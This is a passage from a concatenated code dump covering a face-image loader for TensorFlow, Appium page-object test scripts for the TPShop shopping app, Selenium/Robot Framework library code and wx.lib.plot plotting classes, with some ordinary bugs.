print("Error: batch size must be bigger than 0.")
return batch_data, batch_target
train_data = self.image_data;
train_target = self.label_data;
index = [ i for i in range(0,len(train_target)) ]
np.random.shuffle(index);
for i in range(0,batch_size):
batch_data.append(train_data[index[i]]);
batch_target.append(train_target[index[i]])
# temp = np.array(batch_data)
# print(temp)
return batch_data, batch_target
def show_example(self, index):
image_list_len = len(self.image_list)
if (index >= len(self.image_list)):
print("Error: Current index is %d but image_list size is %d."%(index, image_list_len));
return
#Show one of the image as the example;
image_example = index;
print("Info: Show one image(index %d) as an example."%image_example)
test_image = self.image_list[image_example];
img = mpimg.imread(test_image) #
img.shape
plt.imshow(img)
plt.axis('off')
plt.show()
def one_hot(self, classes, index):
if (classes<=0 or index<0):
print("Error: %d or %d should be all large than 0"%(classes, index))
if (classes <= index):
print("Error: classes %d should be larger than index %d"%(classes, index))
data = [0 for i in range(classes)]
data[index] = 1
ret_data = np.array(data)
return ret_data;
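# Added example: one_hot(5, 2) returns array([0, 0, 1, 0, 0]), i.e. a length-`classes`
# vector with a single 1 at position `index`.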
def load(self, display):
classes = self.classes;
path = self.path;
#Step 1 - Load all image names to image_list;
# Load all image labels to label_list;
filepaths=[os.path.join(path,"s%d"%i)for i in range (1,classes+1)]#
for one_folder in filepaths:
print("Info: Start to load files in %s folder."%one_folder);
for filename in glob.glob(one_folder+'/*.jpg'):
self.image_list.append(os.path.join(filename))#
temp_str = one_folder.split('\\');
length = len(temp_str);
self.label_list.append(temp_str[length-1])#
print("Info: Load %d images from %d folders successfully."%(len(self.image_list), len(filepaths)));
#Step 2 - Read image and store pixel data into image_data;
# Load image labels to label_data;
for index in range(len(self.image_list)):
#Save data to image_data and label_data; this data is used for TensorFlow training;
image_name = self.image_list[index];
img_color = cv2.imread(image_name)
img_gray = cv2.cvtColor(img_color, cv2.COLOR_BGR2GRAY)
img_size = img_gray.shape
img_gray_1d = np.array(img_gray).reshape(img_size[0]*img_size[1]);
self.image_data.append(img_gray_1d)
#Convert folder name from string to int; the face name is the numeric part of the folder name;
#For example, if the folder name is the string S5, then the face name for that folder is the int 5;
folder_name = self.label_list[index]
face_name = re.findall("\d+", folder_name)[0]
d0 = self.one_hot(classes, (int)(face_name) - 1) #The folder start from S1, so we should substract 1;
self.label_data.append(d0)
#Check images size is same or not; Comparing with first image;
if (index == 0):
#Update default value based on first image's size;
self.default_image_width = img_size[0]
self.default_image_height = img_size[1]
else:
image_width = img_size[0]
image_height = img_size[1]
if (image_width!=self.default_image_width or image_height!=self.default_image_height):
print("Error: Image %s, current size is (%d,%d), desired size is (%d,%d)"%
(image_name, image_width, image_height, self.default_image_width, self.default_image_height));
break;
#Display images according to user input;
if (display == 1):
plt.imshow(img_gray)
plt.axis('on')
plt.show()
print("Info: Show converted gray image %s."%image_name)
self.show_example(2)
if __name__=='__main__':
path = ".\\att_faces"
classes = 40
display = 0
face_time = LoadTrainingImage(path, classes)
face_time.load(display)
# face_time.print_path()
batch = face_time.next_batch(10)
face_time.one_hot(classes, 5)
``` |
{
"source": "15008477526/-",
"score": 3
} |
#### File: APP_aaaaaaaa/common/base_app.py
```python
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
import random
desired_caps = {
'platformName': 'android',
'platformVersion': '5.1.1',
'deviceName': '36b7119e',
'appPackage': 'com.tpshop.malls',
'appActivity': '.SPMainActivity',
'unicodeKeyboard': True,
'resetKeyboard': True,
'noReset': True
}
def open_app():
"""打开app"""
return webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)
class BaseApp(object):
def __init__(self, driver):
self.driver = driver
def quit(self):
"""关闭app"""
self.driver.quit()
def wait_page(self):
"""等待页面加载完成"""
try:
ac = self.driver.current_activity
self.driver.wait_activity(ac, 5, 0.5)
except:
return False
def find_element(self, locator):
"""定位单个元素"""
try:
if locator[0] == 'id':
return self.driver.find_element_by_id(locator[1])
elif locator[0] == 'class':
return self.driver.find_element_by_class_name(locator[1])
elif locator[0] == 'xpath':
return self.driver.find_element_by_xpath(locator[1])
elif locator[0] == 'content-desc':
return self.driver.find_element_by_accessibility_id(locator[1])
except:
return False
def find_elements(self, locator):
"""定位多个元素"""
try:
if locator[0] == 'id':
return self.driver.find_elements_by_id(locator[1])
elif locator[0] == 'class':
return self.driver.find_elements_by_class_name(locator[1])
elif locator[0] == 'xpath':
return self.driver.find_elements_by_xpath(locator[1])
elif locator[0] == 'content-desc':
return self.driver.find_elements_by_accessibility_id(locator[1])
except:
return False
def click(self, locator):
"""点击"""
element = self.find_element(locator)
try:
element.click()
except:
return False
def send_keys(self, locator, text):
"""输入"""
element = self.find_element(locator)
try:
element.clear()
element.send_keys(text)
except:
return False
def get_ele_text(self, locator):
"""获取元素文本"""
element = self.find_element(locator)
result = element.text
return result
def random_click(self, locator):
"""随机点击一个元素"""
elements = self.find_elements(locator)
element = random.choice(elements)
element.click()
def tap(self, horizon, vertical):
TouchAction(self.driver).tap(x=horizon, y=vertical).perform()
def iterate_and_click(self, locator):
elements = self.find_elements(locator)
for element in elements:
element.click()
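# Minimal usage sketch (added for illustration; the locator is an assumption, and an Appium
# server must already be listening on http://127.0.0.1:4723):
#   driver = open_app()
#   app = BaseApp(driver)
#   app.wait_page()
#   app.click(('id', 'com.tpshop.malls:id/search_et'))
#   app.quit()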
```
#### File: APP_aaaaaaaa/page/C_1_search_page.py
```python
from page.B_main_page import MainPage
class SearchPage(MainPage):
"""搜索页面"""
search_content_loc = ('id', 'com.tpshop.malls:id/search_et') # search input field
search_button_loc = ('id', 'com.tpshop.malls:id/search_btn') # search button
search_good_loc = ('id', 'com.tpshop.malls:id/product_pic_img') # search result item
search_back_loc = ('id','com.tpshop.malls:id/title_back_img') # back button
def input_search_content(self, text):
"""输入搜索内容"""
self.send_keys(self.search_content_loc, text)
def click_search_button(self):
"""点击搜索按钮"""
self.click(self.search_button_loc)
def click_search_good(self):
"""点击搜索到的商品"""
self.click(self.search_good_loc)
def click_search_back(self):
"""点击返回"""
self.click_search_back()
if __name__ == '__main__':
from common.base_app import open_app
from time import sleep
driver = open_app() # open TPShop and land on the login page
search = SearchPage(driver)
search.input_account_num('13730626896') # enter account number
search.input_password('<PASSWORD>') # enter password
search.wait_page() # wait for the page to load
search.click_confirm_login() # click login
search.wait_page() # wait for the page to load
search.click_search() # click the search box
search.input_search_content('容声冰箱') # search for a Ronshen fridge
search.click_search_button() # click the search button
sleep(1)
search.click_RSfridge() # click the Ronshen fridge
sleep(1)
search.quit()
```
#### File: APP_aaaaaaaa/page/D_good_detail_page.py
```python
from page.C_1_search_page import SearchPage # regular product search page
from page.C_2_group_purchase_page import GroupPurchasePage # group-purchase product page
from page.C_3_promotion_page import PromotionPage # promotion product page
from page.C_4_points_reward_page import PointsRewardPage # points mall page
class GoodDetailPage(SearchPage, GroupPurchasePage, PromotionPage,PointsRewardPage):
"""Product detail page"""
buy_loc = ('id', 'com.tpshop.malls:id/promptly_buy_tv') # Buy Now
confirm_buy_RS_loc = ('id', 'com.tpshop.malls:id/confirm_tv') # Confirm Purchase
exchange_loc = ('id','com.tpshop.malls:id/buy_cart_tv') # Redeem Now (points product)
good_detail_back_loc = ('id','com.tpshop.malls:id/back_ll') # back
def click_buy(self):
"""点击<立即购买>"""
self.click(self.buy_loc)
def click_confrim_buy(self):
"""点击<确认购买>"""
self.click(self.confirm_buy_RS_loc)
def click_exchange(self):
"""点击<立即兑换>"""
self.click(self.exchange_loc)
def click_good_detail_back(self):
"""点击返回"""
self.click(self.good_detail_back_loc)
if __name__ == '__main__':
from common.base_app import open_app
from time import sleep
driver = open_app() # open TPShop and land on the login page
RS = GoodDetailPage(driver)
RS.input_account_num('13730626896') # enter account number
RS.input_password('<PASSWORD>') # enter password
RS.wait_page() # wait for the page to load
RS.click_confirm_login() # click login
RS.wait_page() # wait for the page to load
sleep(2)
"""普通商品"""
# RS.click_search() # 点击搜索框
# RS.input_search_content('容声冰箱') # 搜索容声冰箱
# RS.click_search_button() # 点击搜索按钮
# RS.click_RSfridge() # 点击容声冰箱
"""团购商品"""
# RS.click_group_purchase() # 点击团购
# RS.wait_page() # 等待页面加载
# sleep(1)
# RS.click_sony_mobile() # 点击索尼手机
"""促销商品"""
# RS.click_promotion() # 点击促销商品
# RS.wait_page() # 等待页面加载
# sleep(1)
# RS.click_pomelo() # 点击Pomelo
"""积分商品"""
RS.click_points_reward() # 点击积分商城
RS.wait_page() # 等待页面加载
sleep(1)
RS.click_point_good() # 随机选择一个积分商品进行购买
RS.wait_page() # 等待页面加载
sleep(2)
RS.click_exchange() # 点击立即兑换
# RS.click_buy() # 点击立即购买
RS.click_confrim_buy() # 点击确认购买
sleep(3)
RS.quit()
```
#### File: APP_aaaaaaaa/page/E_confirm_order_page.py
```python
from page.D_good_detail_page import GoodDetailPage
class ConfirmOrderPage(GoodDetailPage):
"""确认订单--容声冰箱"""
select_address_RS_loc = ('id', 'com.tpshop.malls:id/order_address_tv') # 选择收货地址
consignee_RS_loc = ('id', 'com.tpshop.malls:id/address_consignee_tv') # 收货人地址第一个
use_order_balance_loc = ('id', 'com.tpshop.malls:id/order_balance_sth') # 使用余额
sub_order_RS_loc = ('id', 'com.tpshop.malls:id/submit_tv') # 提交订单
pay_pwd_RS_loc = ('id', 'com.tpshop.malls:id/pwd_et') # 支付密码
confirm_pay_pwd_RS_loc = ('id', 'com.tpshop.malls:id/sure_tv') # 确认支付密码
order_balance_loc = ('id', 'com.tpshop.malls:id/order_balance_tv') # 余额
balance_fee_loc = ('id', 'com.tpshop.malls:id/balance_fee_tv') # 支付的余额
points_fee_loc = ('id','com.tpshop.malls:id/has_point_tv') # 使用的积分
def click_address_RS(self):
"""点击选择收货地址"""
self.click(self.select_address_RS_loc)
def choose_consignee_RS(self):
"""选择收货人"""
self.click(self.consignee_RS_loc)
def click_order_balance_RS(self):
"""点击使用余额"""
self.click(self.use_order_balance_loc)
def click_sub_order_RS(self):
"""点击提交订单"""
self.click(self.sub_order_RS_loc)
def input_pay_pwd_RS(self, text):
"""输入支付密码"""
self.send_keys(self.pay_pwd_RS_loc, text)
def click_confirm_pay_pwd_RS(self):
"""确认支付密码"""
self.click(self.confirm_pay_pwd_RS_loc)
def get_order_balance(self):
"""获取订单显示的当前余额"""
return self.get_ele_text(self.order_balance_loc)
def get_balance_fee(self):
"""获取支付的余额"""
return self.get_ele_text(self.balance_fee_loc)
def get_points_fee(self):
"""获取使用的积分"""
return self.get_ele_text(self.points_fee_loc)
if __name__ == '__main__':
from common.base_app import open_app
from time import sleep
driver = open_app() # open TPShop and land on the login page
confirm = ConfirmOrderPage(driver)
confirm.input_account_num('13730626896') # enter account number
confirm.input_password('<PASSWORD>') # enter password
confirm.click_confirm_login() # click login
confirm.wait_page() # wait for the page to load
confirm.click_search() # click the search box
confirm.input_search_content('容声冰箱') # search for a Ronshen fridge
confirm.click_search_button() # click the search button
confirm.wait_page() # wait for the page to load
sleep(2)
confirm.click_RSfridge() # click the Ronshen fridge
confirm.wait_page() # wait for the page to load
sleep(3)
confirm.click_buy_RS() # click Buy Now
confirm.click_confrim_buy_RS() # click Confirm Purchase
confirm.click_address_RS() # click to choose the shipping address
confirm.choose_consignee_RS() # choose the consignee
confirm.click_order_balance_RS() # click to use the balance
confirm.wait_page() # wait for the page to load
confirm.click_sub_order_RS() # click to submit the order
confirm.input_pay_pwd_RS('<PASSWORD>') # enter the payment password
confirm.click_confirm_pay_pwd_RS() # confirm the payment password
sleep(3)
confirm.quit()
```
#### File: APP_aaaaaaaa/page/G_personal_center_page.py
```python
from page.F_my_order import MyOrderPage
class PersonalCenterPage(MyOrderPage):
"""个人中心页面"""
to_appraisal_loc = ('xpath', '//*[@text="待评价"]')
mine_balance_loc = ('id', 'com.tpshop.malls:id/balance_tv') # 我的--余额
mine_points_loc = ('id', 'com.tpshop.malls:id/point_tv') # 我的--积分
def click_to_appraisal(self):
"""点击待评价"""
self.click(self.to_appraisal_loc)
def get_mine_balance(self):
"""获取我的--余额"""
return self.get_ele_text(self.mine_balance_loc)
def get_mine_ponits(self):
"""获取我的--积分"""
return self.get_ele_text(self.mine_points_loc)
```
#### File: APP_aaaaaaaa/page/H_appraisal_center_page.py
```python
from page.G_personal_center_page import PersonalCenterPage
class AppraisalCenterPage(PersonalCenterPage):
"""评价中心页面"""
appraisal_show_loc = ('id', 'com.tpshop.malls:id/order_show_btn') # 评价晒单链接
def click_appraisal_show_link(self):
"""点击评价晒单"""
self.click(self.appraisal_show_loc)
```
#### File: extensions/android/common.py
```python
from selenium import webdriver
from appium.webdriver.mobilecommand import MobileCommand as Command
class Common(webdriver.Remote):
def end_test_coverage(self, intent, path):
"""Ends the coverage collection and pull the coverage.ec file from the device.
Android only.
See https://github.com/appium/appium/blob/master/docs/en/writing-running-appium/android/android-coverage.md
Args:
intent (str): description of operation to be performed
path (str): path to coverage.ec file to be pulled from the device
Returns:
TODO
"""
data = {
'intent': intent,
'path': path,
}
return self.execute(Command.END_TEST_COVERAGE, data)['value']
def open_notifications(self):
"""Open notification shade in Android (API Level 18 and above)
Returns:
`appium.webdriver.webdriver.WebDriver`
"""
self.execute(Command.OPEN_NOTIFICATIONS, {})
return self
@property
def current_package(self):
"""Retrieves the current package running on the device.
"""
return self.execute(Command.GET_CURRENT_PACKAGE)['value']
def _addCommands(self):
self.command_executor._commands[Command.GET_CURRENT_PACKAGE] = \
('GET', '/session/$sessionId/appium/device/current_package')
self.command_executor._commands[Command.END_TEST_COVERAGE] = \
('POST', '/session/$sessionId/appium/app/end_test_coverage')
self.command_executor._commands[Command.OPEN_NOTIFICATIONS] = \
('POST', '/session/$sessionId/appium/device/open_notifications')
```
#### File: site-packages/Selenium2Library/__init__.py
```python
import inspect
from SeleniumLibrary import SeleniumLibrary
__version__ = '3.0.0'
class Selenium2Library(SeleniumLibrary):
ROBOT_LIBRARY_VERSION = __version__
def get_keyword_documentation(self, name):
if name != '__intro__':
doc = SeleniumLibrary.get_keyword_documentation(self, name)
return doc.replace('SeleniumLibrary', 'Selenium2Library')
intro = inspect.getdoc(SeleniumLibrary)
intro = intro.replace('SeleniumLibrary', 'Selenium2Library')
return """
---
*NOTE:* Selenium2Library has been renamed to SeleniumLibrary since version 3.0.
Nowadays Selenium2Library is just a thin wrapper to SeleniumLibrary that eases
with transitioning to the new project. See
[https://github.com/robotframework/SeleniumLibrary|SeleniumLibrary] and
[https://github.com/robotframework/Selenium2Library|Selenium2Library]
project pages for more information.
---
""" + intro
```
#### File: SeleniumLibrary/keywords/alert.py
```python
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from SeleniumLibrary.base import keyword, LibraryComponent
from SeleniumLibrary.utils import is_truthy, secs_to_timestr
class AlertKeywords(LibraryComponent):
ACCEPT = 'ACCEPT'
DISMISS = 'DISMISS'
LEAVE = 'LEAVE'
_next_alert_action = ACCEPT
@keyword
def input_text_into_alert(self, text, action=ACCEPT, timeout=None):
"""Types the given ``text`` into an input field in an alert.
The alert is accepted by default, but that behavior can be controlled
by using the ``action`` argument same way as with `Handle Alert`.
``timeout`` specifies how long to wait for the alert to appear.
If it is not given, the global default `timeout` is used instead.
New in SeleniumLibrary 3.0.
"""
alert = self._wait_alert(timeout)
alert.send_keys(text)
self._handle_alert(alert, action)
@keyword
def alert_should_be_present(self, text='', action=ACCEPT, timeout=None):
"""Verifies that an alert is present and by default, accepts it.
Fails if no alert is present. If ``text`` is a non-empty string,
then it is used to verify alert's message. The alert is accepted
by default, but that behavior can be controlled by using the
``action`` argument same way as with `Handle Alert`.
``timeout`` specifies how long to wait for the alert to appear.
If it is not given, the global default `timeout` is used instead.
``action`` and ``timeout`` arguments are new in SeleniumLibrary 3.0.
In earlier versions, the alert was always accepted and a timeout was
hardcoded to one second.
"""
message = self.handle_alert(action, timeout)
if text and text != message:
raise AssertionError("Alert message should have been '%s' but it "
"was '%s'." % (text, message))
@keyword
def alert_should_not_be_present(self, action=ACCEPT, timeout=0):
"""Verifies that no alert is present.
If the alert actually exists, the ``action`` argument determines
how it should be handled. By default, the alert is accepted, but
it can be also dismissed or left open the same way as with the
`Handle Alert` keyword.
``timeout`` specifies how long to wait for the alert to appear.
By default, the alert is not waited for at all, but a custom time can
be given if the alert may be delayed. See the `time format` section
for information about the syntax.
New in SeleniumLibrary 3.0.
"""
try:
alert = self._wait_alert(timeout)
except AssertionError:
return
text = self._handle_alert(alert, action)
raise AssertionError("Alert with message '%s' present." % text)
@keyword
def handle_alert(self, action=ACCEPT, timeout=None):
"""Handles the current alert and returns its message.
By default, the alert is accepted, but this can be controlled
with the ``action`` argument that supports the following
case-insensitive values:
- ``ACCEPT``: Accept the alert i.e. press ``Ok``. Default.
- ``DISMISS``: Dismiss the alert i.e. press ``Cancel``.
- ``LEAVE``: Leave the alert open.
The ``timeout`` argument specifies how long to wait for the alert
to appear. If it is not given, the global default `timeout` is used
instead.
Examples:
| Handle Alert | | | # Accept alert. |
| Handle Alert | action=DISMISS | | # Dismiss alert. |
| Handle Alert | timeout=10 s | | # Use custom timeout and accept alert. |
| Handle Alert | DISMISS | 1 min | # Use custom timeout and dismiss alert. |
| ${message} = | Handle Alert | | # Accept alert and get its message. |
| ${message} = | Handle Alert | LEAVE | # Leave alert open and get its message. |
New in SeleniumLibrary 3.0.
"""
alert = self._wait_alert(timeout)
return self._handle_alert(alert, action)
def _handle_alert(self, alert, action):
action = action.upper()
text = ' '.join(alert.text.splitlines())
if action == self.ACCEPT:
alert.accept()
elif action == self.DISMISS:
alert.dismiss()
elif action != self.LEAVE:
raise ValueError("Invalid alert action '%s'." % action)
return text
def _wait_alert(self, timeout=None):
timeout = self.get_timeout(timeout)
wait = WebDriverWait(self.driver, timeout)
try:
return wait.until(EC.alert_is_present())
except WebDriverException:
raise AssertionError('Alert not found in %s.'
% secs_to_timestr(timeout))
```
#### File: lib/plot/polyobjects.py
```python
__docformat__ = "restructuredtext en"
# Standard Library
import time as _time
import wx
import warnings
from collections import namedtuple
# Third-Party
try:
import numpy as np
except:
msg = """
This module requires the NumPy module, which could not be
imported. It probably is not installed (it's not part of the
standard Python distribution). See the Numeric Python site
(http://numpy.scipy.org) for information on downloading source or
binaries."""
raise ImportError("NumPy not found.\n" + msg)
# Package
from .utils import pendingDeprecation
from .utils import TempStyle
from .utils import pairwise
class PolyPoints(object):
"""
Base Class for lines and markers.
:param points: The points to plot
:type points: list of ``(x, y)`` pairs
:param attr: Additional attributes
:type attr: dict
.. warning::
All methods are private.
"""
def __init__(self, points, attr):
self._points = np.array(points).astype(np.float64)
self._logscale = (False, False)
self._absScale = (False, False)
self._symlogscale = (False, False)
self._pointSize = (1.0, 1.0)
self.currentScale = (1, 1)
self.currentShift = (0, 0)
self.scaled = self.points
self.attributes = {}
self.attributes.update(self._attributes)
for name, value in attr.items():
if name not in self._attributes.keys():
err_txt = "Style attribute incorrect. Should be one of {}"
raise KeyError(err_txt.format(self._attributes.keys()))
self.attributes[name] = value
@property
def logScale(self):
"""
A tuple of ``(x_axis_is_log10, y_axis_is_log10)`` booleans. If a value
is ``True``, then that axis is plotted on a logarithmic base 10 scale.
:getter: Returns the current value of logScale
:setter: Sets the value of logScale
:type: tuple of bool, length 2
:raises ValueError: when setting an invalid value
"""
return self._logscale
@logScale.setter
def logScale(self, logscale):
if not isinstance(logscale, tuple) or len(logscale) != 2:
raise ValueError("`logscale` must be a 2-tuple of bools")
self._logscale = logscale
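# Added example: on a PolyPoints subclass instance `line`,
#   line.logScale = (True, False)
# plots the x axis as Log10(x) while leaving y linear; a list or a 3-tuple raises
# ValueError per the setter above.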
def setLogScale(self, logscale):
"""
Set to change the axes to plot Log10(values)
Value must be a tuple of booleans (x_axis_bool, y_axis_bool)
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PolyPoints.logScale`
property instead.
"""
pendingDeprecation("self.logScale property")
self._logscale = logscale
@property
def symLogScale(self):
"""
.. warning::
Not yet implemented.
A tuple of ``(x_axis_is_SymLog10, y_axis_is_SymLog10)`` booleans.
If a value is ``True``, then that axis is plotted on a symmetric
logarithmic base 10 scale.
A Symmetric Log10 scale means that values can be positive and
negative. Any values less than
:attr:`~wx.lib.plot.PolyPoints.symLogThresh` will be plotted on
a linear scale to avoid the plot going to infinity near 0.
:getter: Returns the current value of symLogScale
:setter: Sets the value of symLogScale
:type: tuple of bool, length 2
:raises ValueError: when setting an invalid value
.. note::
    This is a simplified example of how SymLog works::
        if x >= thresh:
            x = Log10(x)
        elif x <= -thresh:
            x = -Log10(Abs(x))
        else:
            x = x
.. seealso::
+ :attr:`~wx.lib.plot.PolyPoints.symLogThresh`
+ See http://matplotlib.org/examples/pylab_examples/symlog_demo.html
for an example.
"""
return self._symlogscale
# TODO: Implement symmetric log scale
@symLogScale.setter
def symLogScale(self, symlogscale, thresh):
raise NotImplementedError("Symmetric Log Scale not yet implemented")
if not isinstance(symlogscale, tuple) or len(symlogscale) != 2:
raise ValueError("`symlogscale` must be a 2-tuple of bools")
self._symlogscale = symlogscale
@property
def symLogThresh(self):
"""
.. warning::
Not yet implemented.
A tuple of ``(x_thresh, y_thresh)`` floats that define where the plot
changes to linear scale when using a symmetric log scale.
:getter: Returns the current value of symLogThresh
:setter: Sets the value of symLogThresh
:type: tuple of float, length 2
:raises ValueError: when setting an invalid value
.. note::
    This is a simplified example of how SymLog works::
        if x >= thresh:
            x = Log10(x)
        elif x <= -thresh:
            x = -Log10(Abs(x))
        else:
            x = x
.. seealso::
+ :attr:`~wx.lib.plot.PolyPoints.symLogScale`
+ See http://matplotlib.org/examples/pylab_examples/symlog_demo.html
for an example.
"""
return self._symlogscale
# TODO: Implement symmetric log scale threshold
@symLogThresh.setter
def symLogThresh(self, symlogscale, thresh):
raise NotImplementedError("Symmetric Log Scale not yet implemented")
if not isinstance(symlogscale, tuple) or len(symlogscale) != 2:
raise ValueError("`symlogscale` must be a 2-tuple of bools")
self._symlogscale = symlogscale
@property
def absScale(self):
"""
A tuple of ``(x_axis_is_abs, y_axis_is_abs)`` booleans. If a value
is ``True``, then that axis is plotted on an absolute value scale.
:getter: Returns the current value of absScale
:setter: Sets the value of absScale
:type: tuple of bool, length 2
:raises ValueError: when setting an invalid value
"""
return self._absScale
@absScale.setter
def absScale(self, absscale):
if not isinstance(absscale, tuple) or len(absscale) != 2:
raise ValueError("`absscale` must be a 2-tuple of bools")
self._absScale = absscale
@property
def points(self):
"""
Get or set the plotted points.
:getter: Returns the current value of points, adjusting for the
various scale options such as Log, Abs, or SymLog.
:setter: Sets the value of points.
:type: list of `(x, y)` pairs
.. Note::
Only set unscaled points - do not perform the log, abs, or symlog
adjustments yourself.
"""
data = np.array(self._points, copy=True)  # need the copy
# TODO: get rid of the need for the copy
# work on X:
if self.absScale[0]:
data = self._abs(data, 0)
if self.logScale[0]:
data = self._log10(data, 0)
if self.symLogScale[0]:
# TODO: implement symLogScale
# Should symLogScale override absScale? My vote is no.
# Should symLogScale override logScale? My vote is yes.
# - symLogScale could be a parameter passed to logScale...
pass
# work on Y:
if self.absScale[1]:
data = self._abs(data, 1)
if self.logScale[1]:
data = self._log10(data, 1)
if self.symLogScale[1]:
# TODO: implement symLogScale
pass
return data
@points.setter
def points(self, points):
self._points = points
def _log10(self, data, index):
""" Take the Log10 of the data, dropping any negative values """
data = np.compress(data[:, index] > 0, data, 0)
data[:, index] = np.log10(data[:, index])
return data
def _abs(self, data, index):
""" Take the Abs of the data """
data[:, index] = np.abs(data[:, index])
return data
def boundingBox(self):
"""
Returns the bounding box for the entire dataset as a tuple with this
format::
((minX, minY), (maxX, maxY))
:returns: boundingbox
:rtype: numpy array of ``[[minX, minY], [maxX, maxY]]``
"""
if len(self.points) == 0:
# no curves to draw
# defaults to (-1,-1) and (1,1) but axis can be set in Draw
minXY = np.array([-1.0, -1.0])
maxXY = np.array([1.0, 1.0])
else:
minXY = np.minimum.reduce(self.points)
maxXY = np.maximum.reduce(self.points)
return minXY, maxXY
def scaleAndShift(self, scale=(1, 1), shift=(0, 0)):
"""
Scales and shifts the data for plotting.
:param scale: The values to scale the data by.
:type scale: list of floats: ``[x_scale, y_scale]``
:param shift: The value to shift the data by. This should be in scaled
units
:type shift: list of floats: ``[x_shift, y_shift]``
:returns: None
"""
if len(self.points) == 0:
# no curves to draw
return
# TODO: Can we remove the if statement altogether? Does
# scaleAndShift ever get called when the current value equals
# the new value?
# cast everything to list: some might be np.ndarray objects
if (list(scale) != list(self.currentScale)
or list(shift) != list(self.currentShift)):
# update point scaling
self.scaled = scale * self.points + shift
self.currentScale = scale
self.currentShift = shift
# else unchanged use the current scaling
def getLegend(self):
return self.attributes['legend']
def getClosestPoint(self, pntXY, pointScaled=True):
"""
Returns the index of the closest point on the curve, the point itself,
its scaled coordinates, and the distance to ``pntXY``.
If pointScaled == True, the distance is based on screen coords.
If pointScaled == False, the distance is based on user coords.
"""
if pointScaled:
# Using screen coords
p = self.scaled
pxy = self.currentScale * np.array(pntXY) + self.currentShift
else:
# Using user coords
p = self.points
pxy = np.array(pntXY)
# determine distance for each point
d = np.sqrt(np.add.reduce((p - pxy) ** 2, 1)) # sqrt(dx^2+dy^2)
pntIndex = np.argmin(d)
dist = d[pntIndex]
return [pntIndex,
self.points[pntIndex],
self.scaled[pntIndex] / self._pointSize,
dist]
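# --- Illustrative sketch (not part of the original wx.lib.plot module) ------
# The ``points`` property above applies the abs and log10 adjustments on top
# of the raw data.  ``_DemoPoints`` and ``_demo_polypoints_scaling`` below are
# hypothetical names added purely for documentation; they assume only NumPy
# and the PolyPoints class defined above.
class _DemoPoints(PolyPoints):
    """Minimal concrete subclass so PolyPoints can be instantiated."""
    _attributes = {'legend': ''}


def _demo_polypoints_scaling():
    pts = _DemoPoints([(-10, 1), (0.1, 10), (1, 100), (10, 1000)], attr={})
    pts.absScale = (True, False)   # plot |x| on the x axis
    pts.logScale = (False, True)   # plot log10(y) on the y axis
    # Non-positive values on a log axis are silently dropped by _log10().
    return pts.points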
class PolyLine(PolyPoints):
"""
Creates PolyLine object
:param points: The points that make up the line
:type points: list of ``[x, y]`` values
:param **attr: keyword attributes
=========================== ============= ====================
Keyword and Default Description Type
=========================== ============= ====================
``colour='black'`` Line color :class:`wx.Colour`
``width=1`` Line width float
``style=wx.PENSTYLE_SOLID`` Line style :class:`wx.PenStyle`
``legend=''`` Legend string str
``drawstyle='line'`` see below str
=========================== ============= ====================
================== ==================================================
Draw style Description
================== ==================================================
``'line'``         Draws a straight line between consecutive points
``'steps-pre'`` Draws a line down from point A and then right to
point B
``'steps-post'`` Draws a line right from point A and then down
to point B
``'steps-mid-x'`` Draws a line horizontally to half way between A
and B, then draws a line vertically, then again
horizontally to point B.
``'steps-mid-y'`` Draws a line vertically to half way between A
and B, then draws a line horizontally, then
again vertically to point B.
*Note: This typically does not look very good*
================== ==================================================
.. warning::
All methods except ``__init__`` are private.
"""
_attributes = {'colour': 'black',
'width': 1,
'style': wx.PENSTYLE_SOLID,
'legend': '',
'drawstyle': 'line',
}
_drawstyles = ("line", "steps-pre", "steps-post",
"steps-mid-x", "steps-mid-y")
def __init__(self, points, **attr):
PolyPoints.__init__(self, points, attr)
def draw(self, dc, printerScale, coord=None):
"""
Draw the lines.
:param dc: The DC to draw on.
:type dc: :class:`wx.DC`
:param printerScale:
:type printerScale: float
:param coord: The legend coordinate?
:type coord: ???
"""
colour = self.attributes['colour']
width = self.attributes['width'] * printerScale * self._pointSize[0]
style = self.attributes['style']
drawstyle = self.attributes['drawstyle']
if not isinstance(colour, wx.Colour):
colour = wx.Colour(colour)
pen = wx.Pen(colour, width, style)
pen.SetCap(wx.CAP_BUTT)
dc.SetPen(pen)
if coord is None:
if len(self.scaled): # bugfix for Mac OS X
for c1, c2 in zip(self.scaled, self.scaled[1:]):
self._path(dc, c1, c2, drawstyle)
else:
dc.DrawLines(coord) # draw legend line
def getSymExtent(self, printerScale):
"""
Get the Width and Height of the symbol.
:param printerScale:
:type printerScale: float
"""
h = self.attributes['width'] * printerScale * self._pointSize[0]
w = 5 * h
return (w, h)
def _path(self, dc, coord1, coord2, drawstyle):
"""
Calculates the path from coord1 to coord2 along X and Y
:param dc: The DC to draw on.
:type dc: :class:`wx.DC`
:param coord1: The first coordinate in the coord pair
:type coord1: list, length 2: ``[x, y]``
:param coord2: The second coordinate in the coord pair
:type coord2: list, length 2: ``[x, y]``
:param drawstyle: The type of connector to use
:type drawstyle: str
"""
if drawstyle == 'line':
# Straight line between points.
line = [coord1, coord2]
elif drawstyle == 'steps-pre':
# Up/down to next Y, then right to next X
intermediate = [coord1[0], coord2[1]]
line = [coord1, intermediate, coord2]
elif drawstyle == 'steps-post':
# Right to next X, then up/down to Y
intermediate = [coord2[0], coord1[1]]
line = [coord1, intermediate, coord2]
elif drawstyle == 'steps-mid-x':
# need 3 lines between points: right -> up/down -> right
mid_x = ((coord2[0] - coord1[0]) / 2) + coord1[0]
intermediate1 = [mid_x, coord1[1]]
intermediate2 = [mid_x, coord2[1]]
line = [coord1, intermediate1, intermediate2, coord2]
elif drawstyle == 'steps-mid-y':
# need 3 lines between points: up/down -> right -> up/down
mid_y = ((coord2[1] - coord1[1]) / 2) + coord1[1]
intermediate1 = [coord1[0], mid_y]
intermediate2 = [coord2[0], mid_y]
line = [coord1, intermediate1, intermediate2, coord2]
else:
err_txt = "Invalid drawstyle '{}'. Must be one of {}."
raise ValueError(err_txt.format(drawstyle, self._drawstyles))
dc.DrawLines(line)
class PolySpline(PolyLine):
"""
Creates PolySpline object
:param points: The points that make up the spline
:type points: list of ``[x, y]`` values
:param **attr: keyword attributes
=========================== ============= ====================
Keyword and Default Description Type
=========================== ============= ====================
